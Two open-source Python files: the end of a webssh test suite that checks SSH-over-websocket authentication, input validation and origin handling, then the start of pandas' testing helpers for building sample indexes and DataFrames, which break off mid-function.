self.assertIsNone(msg)
self.assertIn('Missing argument id', ws.close_reason)
@tornado.testing.gen_test
def test_app_with_correct_credentials_but_empty_id(self):
url = self.get_url('/')
response = yield self.async_post(url, self.body)
data = json.loads(to_str(response.body))
self.assert_status_none(data)
url = url.replace('http', 'ws')
ws_url = url + 'ws?id='
ws = yield tornado.websocket.websocket_connect(ws_url)
msg = yield ws.read_message()
self.assertIsNone(msg)
self.assertIn('Missing value id', ws.close_reason)
@tornado.testing.gen_test
def test_app_with_correct_credentials_but_wrong_id(self):
url = self.get_url('/')
response = yield self.async_post(url, self.body)
data = json.loads(to_str(response.body))
self.assert_status_none(data)
url = url.replace('http', 'ws')
ws_url = url + 'ws?id=1' + data['id']
ws = yield tornado.websocket.websocket_connect(ws_url)
msg = yield ws.read_message()
self.assertIsNone(msg)
self.assertIn('Websocket authentication failed', ws.close_reason)
@tornado.testing.gen_test
def test_app_with_correct_credentials_user_bar(self):
body = self.body.replace('robey', 'bar')
url = self.get_url('/')
response = yield self.async_post(url, body)
data = json.loads(to_str(response.body))
self.assert_status_none(data)
url = url.replace('http', 'ws')
ws_url = url + 'ws?id=' + data['id']
ws = yield tornado.websocket.websocket_connect(ws_url)
msg = yield ws.read_message()
self.assertEqual(to_str(msg, data['encoding']), banner)
# messages below will be ignored silently
yield ws.write_message('hello')
yield ws.write_message('"hello"')
yield ws.write_message('[hello]')
yield ws.write_message(json.dumps({'resize': []}))
yield ws.write_message(json.dumps({'resize': {}}))
yield ws.write_message(json.dumps({'resize': 'ab'}))
yield ws.write_message(json.dumps({'resize': ['a', 'b']}))
yield ws.write_message(json.dumps({'resize': {'a': 1, 'b': 2}}))
yield ws.write_message(json.dumps({'resize': [100]}))
yield ws.write_message(json.dumps({'resize': [100]*10}))
yield ws.write_message(json.dumps({'resize': [-1, -1]}))
yield ws.write_message(json.dumps({'data': [1]}))
yield ws.write_message(json.dumps({'data': (1,)}))
yield ws.write_message(json.dumps({'data': {'a': 2}}))
yield ws.write_message(json.dumps({'data': 1}))
yield ws.write_message(json.dumps({'data': 2.1}))
yield ws.write_message(json.dumps({'key-non-existed': 'hello'}))
# end - those just for testing webssh websocket stablity
yield ws.write_message(json.dumps({'resize': [79, 23]}))
msg = yield ws.read_message()
self.assertEqual(b'resized', msg)
yield ws.write_message(json.dumps({'data': 'bye'}))
msg = yield ws.read_message()
self.assertEqual(b'bye', msg)
ws.close()
@tornado.testing.gen_test
def test_app_auth_with_valid_pubkey_by_urlencoded_form(self):
url = self.get_url('/')
privatekey = read_file(make_tests_data_path('user_rsa_key'))
self.body_dict.update(privatekey=privatekey)
response = yield self.async_post(url, self.body_dict)
data = json.loads(to_str(response.body))
self.assert_status_none(data)
url = url.replace('http', 'ws')
ws_url = url + 'ws?id=' + data['id']
ws = yield tornado.websocket.websocket_connect(ws_url)
msg = yield ws.read_message()
self.assertEqual(to_str(msg, data['encoding']), banner)
ws.close()
@tornado.testing.gen_test
def test_app_auth_with_valid_pubkey_by_multipart_form(self):
url = self.get_url('/')
privatekey = read_file(make_tests_data_path('user_rsa_key'))
files = [('privatekey', 'user_rsa_key', privatekey)]
content_type, body = encode_multipart_formdata(self.body_dict.items(),
files)
headers = {
'Content-Type': content_type, 'content-length': str(len(body))
}
response = yield self.async_post(url, body, headers=headers)
data = json.loads(to_str(response.body))
self.assert_status_none(data)
url = url.replace('http', 'ws')
ws_url = url + 'ws?id=' + data['id']
ws = yield tornado.websocket.websocket_connect(ws_url)
msg = yield ws.read_message()
self.assertEqual(to_str(msg, data['encoding']), banner)
ws.close()
@tornado.testing.gen_test
def test_app_auth_with_invalid_pubkey_for_user_robey(self):
url = self.get_url('/')
privatekey = 'h' * 1024
files = [('privatekey', 'user_rsa_key', privatekey)]
content_type, body = encode_multipart_formdata(self.body_dict.items(),
files)
headers = {
'Content-Type': content_type, 'content-length': str(len(body))
}
if swallow_http_errors:
response = yield self.async_post(url, body, headers=headers)
self.assertIn(b'Invalid private key', response.body)
else:
with self.assertRaises(HTTPError) as ctx:
yield self.async_post(url, body, headers=headers)
self.assertIn('Bad Request', ctx.exception.message)
@tornado.testing.gen_test
def test_app_auth_with_pubkey_exceeds_key_max_size(self):
url = self.get_url('/')
privatekey = 'h' * (handler.KEY_MAX_SIZE * 2)
files = [('privatekey', 'user_rsa_key', privatekey)]
content_type, body = encode_multipart_formdata(self.body_dict.items(),
files)
headers = {
'Content-Type': content_type, 'content-length': str(len(body))
}
if swallow_http_errors:
response = yield self.async_post(url, body, headers=headers)
self.assertIn(b'Invalid private key', response.body)
else:
with self.assertRaises(HTTPError) as ctx:
yield self.async_post(url, body, headers=headers)
self.assertIn('Bad Request', ctx.exception.message)
@tornado.testing.gen_test
def test_app_auth_with_pubkey_cannot_be_decoded_by_multipart_form(self):
url = self.get_url('/')
privatekey = 'h' * 1024
files = [('privatekey', 'user_rsa_key', privatekey)]
content_type, body = encode_multipart_formdata(self.body_dict.items(),
files)
body = body.encode('utf-8')
# added some gbk bytes to the privatekey, make it cannot be decoded
body = body[:-100] + b'\xb4\xed\xce\xf3' + body[-100:]
headers = {
'Content-Type': content_type, 'content-length': str(len(body))
}
if swallow_http_errors:
response = yield self.async_post(url, body, headers=headers)
self.assertIn(b'Invalid unicode', response.body)
else:
with self.assertRaises(HTTPError) as ctx:
yield self.async_post(url, body, headers=headers)
self.assertIn('Bad Request', ctx.exception.message)
def test_app_post_form_with_large_body_size_by_multipart_form(self):
privatekey = 'h' * (2 * max_body_size)
files = [('privatekey', 'user_rsa_key', privatekey)]
content_type, body = encode_multipart_formdata(self.body_dict.items(),
files)
headers = {
'Content-Type': content_type, 'content-length': str(len(body))
}
response = self.sync_post('/', body, headers=headers)
self.assertIn(response.code, [400, 599])
def test_app_post_form_with_large_body_size_by_urlencoded_form(self):
privatekey = 'h' * (2 * max_body_size)
body = self.body + '&privatekey=' + privatekey
response = self.sync_post('/', body)
self.assertIn(response.code, [400, 599])
@tornado.testing.gen_test
def test_app_with_user_keyonly_for_bad_authentication_type(self):
self.body_dict.update(username='keyonly', password='foo')
response = yield self.async_post('/', self.body_dict)
self.assertEqual(response.code, 200)
self.assert_status_in(json.loads(to_str(response.body)), 'Bad authentication type') # noqa
class OtherTestBase(TestAppBase):
sshserver_port = 3300
headers = {'Cookie': '_xsrf=yummy'}
debug = False
policy = None
xsrf = True
hostfile = ''
syshostfile = ''
tdstream = ''
maxconn = 20
origin = 'same'
body = {
'hostname': '127.0.0.1',
'port': '',
'username': 'robey',
'password': 'foo',
'_xsrf': 'yummy'
}
def get_app(self):
self.body.update(port=str(self.sshserver_port))
loop = self.io_loop
options.debug = self.debug
options.xsrf = self.xsrf
options.policy = self.policy if self.policy else random.choice(['warning', 'autoadd']) # noqa
options.hostfile = self.hostfile
options.syshostfile = self.syshostfile
options.tdstream = self.tdstream
options.maxconn = self.maxconn
options.origin = self.origin
app = make_app(make_handlers(loop, options), get_app_settings(options))
return app
def setUp(self):
print('='*20)
self.running = True
OtherTestBase.sshserver_port += 1
t = threading.Thread(
target=run_ssh_server, args=(self.sshserver_port, self.running)
)
t.setDaemon(True)
t.start()
super(OtherTestBase, self).setUp()
def tearDown(self):
self.running = False
print('='*20)
super(OtherTestBase, self).tearDown()
class TestAppInDebugMode(OtherTestBase):
debug = True
def assert_response(self, bstr, response):
if swallow_http_errors:
self.assertEqual(response.code, 200)
self.assertIn(bstr, response.body)
else:
self.assertEqual(response.code, 500)
self.assertIn(b'Uncaught exception', response.body)
def test_server_error_for_post_method(self):
body = dict(self.body, error='raise')
response = self.sync_post('/', body)
self.assert_response(b'"status": "Internal Server Error"', response)
def test_html(self):
response = self.fetch('/', method='GET')
self.assertIn(b'novalidate>', response.body)
class TestAppWithLargeBuffer(OtherTestBase):
@tornado.testing.gen_test
def test_app_for_sending_message_with_large_size(self):
url = self.get_url('/')
response = yield self.async_post(url, dict(self.body, username='foo'))
data = json.loads(to_str(response.body))
self.assert_status_none(data)
url = url.replace('http', 'ws')
ws_url = url + 'ws?id=' + data['id']
ws = yield tornado.websocket.websocket_connect(ws_url)
msg = yield ws.read_message()
self.assertEqual(to_str(msg, data['encoding']), banner)
send = 'h' * (64 * 1024) + '\r\n\r\n'
yield ws.write_message(json.dumps({'data': send}))
lst = []
while True:
msg = yield ws.read_message()
lst.append(msg)
if msg.endswith(b'\r\n\r\n'):
break
recv = b''.join(lst).decode(data['encoding'])
self.assertEqual(send, recv)
ws.close()
class TestAppWithRejectPolicy(OtherTestBase):
policy = 'reject'
hostfile = make_tests_data_path('known_hosts_example')
@tornado.testing.gen_test
def test_app_with_hostname_not_in_hostkeys(self):
response = yield self.async_post('/', self.body)
data = json.loads(to_str(response.body))
message = 'Connection to {}:{} is not allowed.'.format(self.body['hostname'], self.sshserver_port) # noqa
self.assertEqual(message, data['status'])
class TestAppWithBadHostKey(OtherTestBase):
policy = random.choice(['warning', 'autoadd', 'reject'])
hostfile = make_tests_data_path('test_known_hosts')
def setUp(self):
self.sshserver_port = 2222
super(TestAppWithBadHostKey, self).setUp()
@tornado.testing.gen_test
def test_app_with_bad_host_key(self):
response = yield self.async_post('/', self.body)
data = json.loads(to_str(response.body))
self.assertEqual('Bad host key.', data['status'])
class TestAppWithTrustedStream(OtherTestBase):
tdstream = '127.0.0.2'
def test_with_forbidden_get_request(self):
response = self.fetch('/', method='GET')
self.assertEqual(response.code, 403)
self.assertIn('Forbidden', response.error.message)
def test_with_forbidden_post_request(self):
response = self.sync_post('/', self.body)
self.assertEqual(response.code, 403)
self.assertIn('Forbidden', response.error.message)
def test_with_forbidden_put_request(self):
response = self.fetch_request('/', method='PUT', body=self.body)
self.assertEqual(response.code, 403)
self.assertIn('Forbidden', response.error.message)
class TestAppNotFoundHandler(OtherTestBase):
custom_headers = handler.MixinHandler.custom_headers
def test_with_not_found_get_request(self):
response = self.fetch('/pathnotfound', method='GET')
self.assertEqual(response.code, 404)
self.assertEqual(
response.headers['Server'], self.custom_headers['Server']
)
self.assertIn(b'404: Not Found', response.body)
def test_with_not_found_post_request(self):
response = self.sync_post('/pathnotfound', self.body)
self.assertEqual(response.code, 404)
self.assertEqual(
response.headers['Server'], self.custom_headers['Server']
)
self.assertIn(b'404: Not Found', response.body)
def test_with_not_found_put_request(self):
response = self.fetch_request('/pathnotfound', method='PUT',
body=self.body)
self.assertEqual(response.code, 404)
self.assertEqual(
response.headers['Server'], self.custom_headers['Server']
)
self.assertIn(b'404: Not Found', response.body)
class TestAppWithHeadRequest(OtherTestBase):
def test_with_index_path(self):
response = self.fetch('/', method='HEAD')
self.assertEqual(response.code, 200)
def test_with_ws_path(self):
response = self.fetch('/ws', method='HEAD')
self.assertEqual(response.code, 405)
def test_with_not_found_path(self):
response = self.fetch('/notfound', method='HEAD')
self.assertEqual(response.code, 404)
class TestAppWithPutRequest(OtherTestBase):
xsrf = False
@tornado.testing.gen_test
def test_app_with_method_not_supported(self):
with self.assertRaises(HTTPError) as ctx:
yield self.fetch_request('/', 'PUT', self.body, sync=False)
self.assertIn('Method Not Allowed', ctx.exception.message)
class TestAppWithTooManyConnections(OtherTestBase):
maxconn = 1
def setUp(self):
clients.clear()
super(TestAppWithTooManyConnections, self).setUp()
@tornado.testing.gen_test
def test_app_with_too_many_connections(self):
clients['127.0.0.1'] = {'fake_worker_id': None}
url = self.get_url('/')
response = yield self.async_post(url, self.body)
data = json.loads(to_str(response.body))
self.assertEqual('Too many live connections.', data['status'])
clients['127.0.0.1'].clear()
response = yield self.async_post(url, self.body)
self.assert_status_none(json.loads(to_str(response.body)))
class TestAppWithCrossOriginOperation(OtherTestBase):
origin = 'http://www.example.com'
@tornado.testing.gen_test
def test_app_with_wrong_event_origin(self):
body = dict(self.body, _origin='localhost')
response = yield self.async_post('/', body)
self.assert_status_equal(json.loads(to_str(response.body)), 'Cross origin operation is not allowed.') # noqa
@tornado.testing.gen_test
def test_app_with_wrong_header_origin(self):
headers = dict(Origin='localhost')
response = yield self.async_post('/', self.body, headers=headers)
self.assert_status_equal(json.loads(to_str(response.body)), 'Cross origin operation is not allowed.') # noqa
@tornado.testing.gen_test
def test_app_with_correct_event_origin(self):
body = dict(self.body, _origin=self.origin)
response = yield self.async_post('/', body)
self.assert_status_none(json.loads(to_str(response.body)))
self.assertIsNone(response.headers.get('Access-Control-Allow-Origin'))
@tornado.testing.gen_test
def test_app_with_correct_header_origin(self):
headers = dict(Origin=self.origin)
response = yield self.async_post('/', self.body, headers=headers)
self.assert_status_none(json.loads(to_str(response.body)))
self.assertEqual(
response.headers.get('Access-Control-Allow-Origin'), self.origin
)
|
__init__.py
|
from __future__ import annotations
import collections
from datetime import datetime
from decimal import Decimal
from functools import wraps
import operator
import os
import re
import string
from typing import (
TYPE_CHECKING,
Callable,
ContextManager,
Counter,
Iterable,
)
import warnings
import numpy as np
from pandas._config.localization import ( # noqa:F401
can_set_locale,
get_locales,
set_locale,
)
from pandas._typing import Dtype
from pandas.core.dtypes.common import (
is_datetime64_dtype,
is_datetime64tz_dtype,
is_period_dtype,
is_sequence,
is_timedelta64_dtype,
)
import pandas as pd
from pandas import (
Categorical,
CategoricalIndex,
DataFrame,
DatetimeIndex,
Index,
IntervalIndex,
MultiIndex,
RangeIndex,
Series,
bdate_range,
)
from pandas._testing._io import ( # noqa:F401
close,
network,
round_trip_localpath,
round_trip_pathlib,
round_trip_pickle,
with_connectivity_check,
write_to_compressed,
)
from pandas._testing._random import ( # noqa:F401
randbool,
rands,
rands_array,
randu_array,
)
from pandas._testing._warnings import assert_produces_warning # noqa:F401
from pandas._testing.asserters import ( # noqa:F401
assert_almost_equal,
assert_attr_equal,
assert_categorical_equal,
assert_class_equal,
assert_contains_all,
assert_copy,
assert_datetime_array_equal,
assert_dict_equal,
assert_equal,
assert_extension_array_equal,
assert_frame_equal,
assert_index_equal,
assert_interval_array_equal,
assert_is_sorted,
assert_is_valid_plot_return_object,
assert_numpy_array_equal,
assert_period_array_equal,
assert_series_equal,
assert_sp_array_equal,
assert_timedelta_array_equal,
raise_assert_detail,
)
from pandas._testing.compat import get_dtype # noqa:F401
from pandas._testing.contexts import ( # noqa:F401
RNGContext,
decompress_file,
ensure_clean,
ensure_clean_dir,
ensure_safe_environment_variables,
set_timezone,
use_numexpr,
with_csv_dialect,
)
from pandas.core.arrays import (
DatetimeArray,
PandasArray,
PeriodArray,
TimedeltaArray,
period_array,
)
if TYPE_CHECKING:
from pandas import (
PeriodIndex,
TimedeltaIndex,
)
_N = 30
_K = 4
UNSIGNED_INT_DTYPES: list[Dtype] = ["uint8", "uint16", "uint32", "uint64"]
UNSIGNED_EA_INT_DTYPES: list[Dtype] = ["UInt8", "UInt16", "UInt32", "UInt64"]
SIGNED_INT_DTYPES: list[Dtype] = [int, "int8", "int16", "int32", "int64"]
SIGNED_EA_INT_DTYPES: list[Dtype] = ["Int8", "Int16", "Int32", "Int64"]
ALL_INT_DTYPES = UNSIGNED_INT_DTYPES + SIGNED_INT_DTYPES
ALL_EA_INT_DTYPES = UNSIGNED_EA_INT_DTYPES + SIGNED_EA_INT_DTYPES
FLOAT_DTYPES: list[Dtype] = [float, "float32", "float64"]
FLOAT_EA_DTYPES: list[Dtype] = ["Float32", "Float64"]
COMPLEX_DTYPES: list[Dtype] = [complex, "complex64", "complex128"]
STRING_DTYPES: list[Dtype] = [str, "str", "U"]
DATETIME64_DTYPES: list[Dtype] = ["datetime64[ns]", "M8[ns]"]
TIMEDELTA64_DTYPES: list[Dtype] = ["timedelta64[ns]", "m8[ns]"]
BOOL_DTYPES: list[Dtype] = [bool, "bool"]
BYTES_DTYPES: list[Dtype] = [bytes, "bytes"]
OBJECT_DTYPES: list[Dtype] = [object, "object"]
ALL_REAL_DTYPES = FLOAT_DTYPES + ALL_INT_DTYPES
ALL_NUMPY_DTYPES = (
ALL_REAL_DTYPES
+ COMPLEX_DTYPES
+ STRING_DTYPES
+ DATETIME64_DTYPES
+ TIMEDELTA64_DTYPES
+ BOOL_DTYPES
+ OBJECT_DTYPES
+ BYTES_DTYPES
)
NULL_OBJECTS = [None, np.nan, pd.NaT, float("nan"), pd.NA, Decimal("NaN")]
EMPTY_STRING_PATTERN = re.compile("^$")
# set testing_mode
_testing_mode_warnings = (DeprecationWarning, ResourceWarning)
def set_testing_mode():
# set the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
for category in _testing_mode_warnings:
warnings.simplefilter("always", category)
def reset_testing_mode():
# reset the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
for category in _testing_mode_warnings:
warnings.simplefilter("ignore", category)
set_testing_mode()
def reset_display_options():
"""
Reset the display options for printing and representing objects.
"""
pd.reset_option("^display.", silent=True)
# -----------------------------------------------------------------------------
# Comparators
def equalContents(arr1, arr2) -> bool:
"""
Checks if the set of unique elements of arr1 and arr2 are equivalent.
"""
return frozenset(arr1) == frozenset(arr2)
def box_expected(expected, box_cls, transpose=True):
"""
Helper function to wrap the expected output of a test in a given box_class.
Parameters
----------
expected : np.ndarray, Index, Series
box_cls : {Index, Series, DataFrame}
Returns
-------
subclass of box_cls
"""
if box_cls is pd.array:
if isinstance(expected, RangeIndex):
# pd.array would return an IntegerArray
expected = PandasArray(np.asarray(expected._values))
else:
expected = pd.array(expected)
elif box_cls is Index:
expected = Index(expected)
elif box_cls is Series:
expected = Series(expected)
elif box_cls is DataFrame:
expected = Series(expected).to_frame()
if transpose:
# for vector operations, we need a DataFrame to be a single-row,
# not a single-column, in order to operate against non-DataFrame
# vectors of the same length. But convert to two rows to avoid
# single-row special cases in datetime arithmetic
expected = expected.T
expected = pd.concat([expected] * 2, ignore_index=True)
elif box_cls is PeriodArray:
# the PeriodArray constructor is not as flexible as period_array
expected = period_array(expected)
elif box_cls is DatetimeArray:
expected = DatetimeArray(expected)
elif box_cls is TimedeltaArray:
expected = TimedeltaArray(expected)
elif box_cls is np.ndarray:
expected = np.array(expected)
elif box_cls is to_array:
expected = to_array(expected)
else:
raise NotImplementedError(box_cls)
return expected
def to_array(obj):
# temporary implementation until we get pd.array in place
dtype = getattr(obj, "dtype", None)
if is_period_dtype(dtype):
return period_array(obj)
elif is_datetime64_dtype(dtype) or is_datetime64tz_dtype(dtype):
return DatetimeArray._from_sequence(obj)
elif is_timedelta64_dtype(dtype):
return TimedeltaArray._from_sequence(obj)
else:
return np.array(obj)
# -----------------------------------------------------------------------------
# Others
def getCols(k):
return string.ascii_uppercase[:k]
# make index
def makeStringIndex(k=10, name=None):
return Index(rands_array(nchars=10, size=k), name=name)
def makeUnicodeIndex(k=10, name=None):
return Index(randu_array(nchars=10, size=k), name=name)
def makeCategoricalIndex(k=10, n=3, name=None, **kwargs):
""" make a length k index or n categories """
x = rands_array(nchars=4, size=n)
return CategoricalIndex(
Categorical.from_codes(np.arange(k) % n, categories=x), name=name, **kwargs
)
def makeIntervalIndex(k=10, name=None, **kwargs):
""" make a length k IntervalIndex """
x = np.linspace(0, 100, num=(k + 1))
return IntervalIndex.from_breaks(x, name=name, **kwargs)
def makeBoolIndex(k=10, name=None):
if k == 1:
return Index([True], name=name)
elif k == 2:
return Index([False, True], name=name)
return Index([False, True] + [False] * (k - 2), name=name)
def makeIntIndex(k=10, name=None):
return Index(list(range(k)), name=name)
def makeUIntIndex(k=10, name=None):
return Index([2 ** 63 + i for i in range(k)], name=name)
def makeRangeIndex(k=10, name=None, **kwargs):
return RangeIndex(0, k, 1, name=name, **kwargs)
def makeFloatIndex(k=10, name=None):
values = sorted(np.random.random_sample(k)) - np.random.random_sample(1)
return Index(values * (10 ** np.random.randint(0, 9)), name=name)
def makeDateIndex(k: int = 10, freq="B", name=None, **kwargs) -> DatetimeIndex:
dt = datetime(2000, 1, 1)
dr = bdate_range(dt, periods=k, freq=freq, name=name)
return DatetimeIndex(dr, name=name, **kwargs)
def makeTimedeltaIndex(k: int = 10, freq="D", name=None, **kwargs) -> TimedeltaIndex:
return pd.timedelta_range(start="1 day", periods=k, freq=freq, name=name, **kwargs)
def makePeriodIndex(k: int = 10, name=None, **kwargs) -> PeriodIndex:
dt = datetime(2000, 1, 1)
return pd.period_range(start=dt, periods=k, freq="B", name=name, **kwargs)
def makeMultiIndex(k=10, names=None, **kwargs):
return MultiIndex.from_product((("foo", "bar"), (1, 2)), names=names, **kwargs)
_names = [
"Alice",
"Bob",
"Charlie",
"Dan",
"Edith",
"Frank",
"George",
"Hannah",
"Ingrid",
"Jerry",
"Kevin",
"Laura",
"Michael",
"Norbert",
"Oliver",
"Patricia",
"Quinn",
"Ray",
"Sarah",
"Tim",
"Ursula",
"Victor",
"Wendy",
"Xavier",
"Yvonne",
"Zelda",
]
def _make_timeseries(start="2000-01-01", end="2000-12-31", freq="1D", seed=None):
"""
Make a DataFrame with a DatetimeIndex
Parameters
----------
start : str or Timestamp, default "2000-01-01"
The start of the index. Passed to date_range with `freq`.
end : str or Timestamp, default "2000-12-31"
The end of the index. Passed to date_range with `freq`.
freq : str or Freq
The frequency to use for the DatetimeIndex
seed : int, optional
The random state seed.
* name : object dtype with string names
* id : int dtype with
* x, y : float dtype
Examples
--------
>>> _make_timeseries()
id name x y
timestamp
2000-01-01 982 Frank 0.031261 0.986727
2000-01-02 1025 Edith -0.086358 -0.032920
2000-01-03 982 Edith 0.473177 0.298654
2000-01-04 1009 Sarah 0.534344 -0.750377
2000-01-05 963 Zelda -0.271573 0.054424
... ... ... ... ...
2000-12-27 980 Ingrid -0.132333 -0.422195
2000-12-28 972 Frank -0.376007 -0.298687
2000-12-29 1009 Ursula -0.865047 -0.503133
2000-12-30 1000 Hannah -0.063757 -0.507336
2000-12-31 972 Tim -0.869120 0.531685
"""
index = pd.date_range(start=start, end=end, freq=freq, name="timestamp")
n = len(index)
state = np.random.RandomState(seed)
columns = {
"name": state.choice(_names, size=n),
"id": state.poisson(1000, size=n),
"x": state.rand(n) * 2 - 1,
"y": state.rand(n) * 2 - 1,
}
df = DataFrame(columns, index=index, columns=sorted(columns))
if df.index[-1] == end:
df = df.iloc[:-1]
return df
def index_subclass_makers_generator():
make_index_funcs = [
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
makeRangeIndex,
makeIntervalIndex,
makeCategoricalIndex,
makeMultiIndex,
]
yield from make_index_funcs
def all_timeseries_index_generator(k: int = 10) -> Iterable[Index]:
"""
Generator which can be iterated over to get instances of all the classes
which represent time-series.
Parameters
----------
k: length of each of the index instances
"""
make_index_funcs: list[Callable[..., Index]] = [
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
]
for make_index_func in make_index_funcs:
yield make_index_func(k=k)
# make series
def makeFloatSeries(name=None):
index = makeStringIndex(_N)
return Series(np.random.randn(_N), index=index, name=name)
def makeStringSeries(name=None):
index = makeStringIndex(_N)
return Series(np.random.randn(_N), index=index, name=name)
def makeObjectSeries(name=None):
data = makeStringIndex(_N)
data = Index(data, dtype=object)
index = makeStringIndex(_N)
return Series(data, index=index, name=name)
def getSeriesData():
index = makeStringIndex(_N)
return {c: Series(np.random.randn(_N), index=index) for c in getCols(_K)}
def makeTimeSeries(nper=None, freq="B", name=None):
if nper is None:
nper = _N
return Series(
np.random.randn(nper), index=makeDateIndex(nper, freq=freq), name=name
)
def makePeriodSeries(nper=None, name=None):
if nper is None:
nper = _N
return Series(np.random.randn(nper), index=makePeriodIndex(nper), name=name)
def getTimeSeriesData(nper=None, freq="B"):
return {c: makeTimeSeries(nper, freq) for c in getCols(_K)}
def getPeriodData(nper=None):
return {c: makePeriodSeries(nper) for c in getCols(_K)}
# make frame
def makeTimeDataFrame(nper=None, freq="B"):
data = getTimeSeriesData(nper, freq)
return DataFrame(data)
def makeDataFrame() -> DataFrame:
data = getSeriesData()
return DataFrame(data)
def getMixedTypeDict():
index = Index(["a", "b", "c", "d", "e"])
data = {
"A": [0.0, 1.0, 2.0, 3.0, 4.0],
"B": [0.0, 1.0, 0.0, 1.0, 0.0],
"C": ["foo1", "foo2", "foo3", "foo4", "foo5"],
"D": bdate_range("1/1/2009", periods=5),
}
return index, data
def makeMixedDataFrame():
return DataFrame(getMixedTypeDict()[1])
def makePeriodFrame(nper=None):
data = getPeriodData(nper)
return DataFrame(data)
def makeCustomIndex(
nentries, nlevels, prefix="#", names=False, ndupe_l=None, idx_type=None
):
"""
Create an index/multindex with given dimensions, levels, names, etc'
nentries - number of entries in index
nlevels - number of levels (> 1 produces multindex)
prefix - a string prefix for labels
names - (Optional), bool or list of strings. if True will use default
names, if false will use no names, if a list is given, the name of
each level in the index will be taken from the list.
ndupe_l - (Optional), list of ints, the number of rows for which the
label will repeated at the corresponding level, you can specify just
the first few, the rest will use the default ndupe_l of 1.
len(ndupe_l) <= nlevels.
idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a datetime index.
if unspecified, string labels will be generated.
"""
if ndupe_l is None:
ndupe_l = [1] * nlevels
assert is_sequence(ndupe_l) and len(ndupe_l) <= nlevels
assert names is None or names is False or names is True or len(names) is nlevels
assert idx_type is None or (
idx_type in ("i", "f", "s", "u", "dt", "p", "td") and nlevels == 1
)
if names is True:
# build default names
names = [prefix + str(i) for i in range(nlevels)]
if names is False:
# pass None to index constructor for no name
names = None
# make singleton case uniform
if isinstance(names, str) and nlevels == 1:
names = [names]
# specific 1D index type requested?
idx_func_dict: dict[str, Callable[..., Index]] = {
"i": makeIntIndex,
"f": makeFloatIndex,
"s": makeStringIndex,
"u": makeUnicodeIndex,
"dt": makeDateIndex,
"td": makeTimedeltaIndex,
"p": makePeriodIndex,
}
idx_func = idx_func_dict.get(idx_type)
if idx_func:
idx = idx_func(nentries)
# but we need to fill in the name
if names:
idx.name = names[0]
return idx
elif idx_type is not None:
raise ValueError(
f"{repr(idx_type)} is not a legal value for `idx_type`, "
"use 'i'/'f'/'s'/'u'/'dt'/'p'/'td'."
)
if len(ndupe_l) < nlevels:
ndupe_l.extend([1] * (nlevels - len(ndupe_l)))
assert len(ndupe_l) == nlevels
assert all(x > 0 for x in ndupe_l)
list_of_lists = []
for i in range(nlevels):
def keyfunc(x):
import re
numeric_tuple = re.sub(r"[^\d_]_?", "", x).split("_")
return [int(num) for num in numeric_tuple]
# build a list of lists to create the index from
div_factor = nentries // ndupe_l[i] + 1
# Deprecated since version 3.9: collections.Counter now supports []. See PEP 585
# and Generic Alias Type.
cnt: Counter[str] = collections.Counter()
for j in range(div_factor):
label = f"{prefix}_l{i}_g{j}"
cnt[label] = ndupe_l[i]
# cute Counter trick
result = sorted(cnt.elements(), key=keyfunc)[:nentries]
list_of_lists.append(result)
tuples = list(zip(*list_of_lists))
# convert tuples to index
if nentries == 1:
# we have a single level of tuples, i.e. a regular Index
index = Index(tuples[0], name=names[0])
elif nlevels == 1:
name = None if names is None else names[0]
index = Index((x[0] for x in tuples), name=name)
else:
index = MultiIndex.from_tuples(tuples, names=names)
return index
def makeCustomDataframe(
nrows,
ncols,
c_idx_names=True,
r_idx_names=True,
c_idx_nlevels=1,
r_idx_nlevels=1,
data_gen_f=None,
c_ndupe_l=None,
r_ndupe_l=None,
dtype=None,
c_idx_type=None,
r_idx_type=None,
):
"""
Create a DataFrame using supplied parameters.
Parameters
----------
nrows, ncols - number of data rows/cols
c_idx_names, idx_names - False/True/list of strings, yields No names ,
default names or uses the provided names for the levels of the
corresponding index. You can provide a single string when
c_idx_nlevels ==1.
c_idx_nlevels - number of levels in columns index. > 1 will yield MultiIndex
r_idx_nlevels - number of levels in rows index. > 1 will yield MultiIndex
data_gen_f - a function f(row,col) which return the data value
at that position, the default generator used yields values of the form
"RxCy" based on position.
c_ndupe_l, r_ndupe_l - list of integers, determines the number
of duplicates for each label at a given level of the corresponding
index. The default `None` value produces a multiplicity of 1 across
all levels, i.e. a unique index. Will accept a partial list of length
N < idx_nlevels, for just the first N levels. If ndupe doesn't divide
nrows/ncol, the last label might have lower multiplicity.
dtype - passed to the DataFrame constructor as is, in case you wish to
have more control in conjunction with a custom `data_gen_f`
r_idx_type, c_idx_type - "i"/"f"/"s"/"u"/"dt"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a timedelta index.
if unspecified, string labels will be generated.
Examples
--------
# 5 row, 3 columns, default names on both, single index on both axis
>> makeCustomDataframe(5,3)
# make the data a random int between 1 and 100
>> mkdf(5,3,data_gen_f=lambda r,c:randint(1,100))
# 2-level multiindex on rows with each label duplicated
# twice on first level, default names on both axis, single
# index on both axis
>> a=makeCustomDataframe(5,3,r_idx_nlevels=2,r_ndupe_l=[2])
# DatetimeIndex on row, index with unicode labels on columns
# no names on either axis
>> a=makeCustomDataframe(5,3,c_idx_names=False,r_idx_names=False,
r_idx_type="dt",c_idx_type="u")
# 4-level multindex on rows with names provided, 2-level multindex
# on columns with default labels and default names.
>> a=makeCustomDataframe(5,3,r_idx_nlevels=4,
r_idx_names=["FEE","FIH","FOH","FUM"],
c_idx_nlevels=2)
>> a=mkdf(5,3,r_idx_nlevels=2,c_idx_nlevels=4)
"""
assert c_idx_nlevels > 0
assert r_idx_nlevels > 0
assert r_idx_type is None or (
r_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and r_idx_nlevels == 1
)
assert c_idx_type is None or (
c_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and c_idx_nlevels == 1
)
columns = makeCustomIndex(
ncols,
nlevels=c_idx_nlevels,
prefix="C",
names=c_idx_names,
ndupe_l=c_ndupe_l,
idx_type=c_idx_type,
)
index = makeCustomIndex(
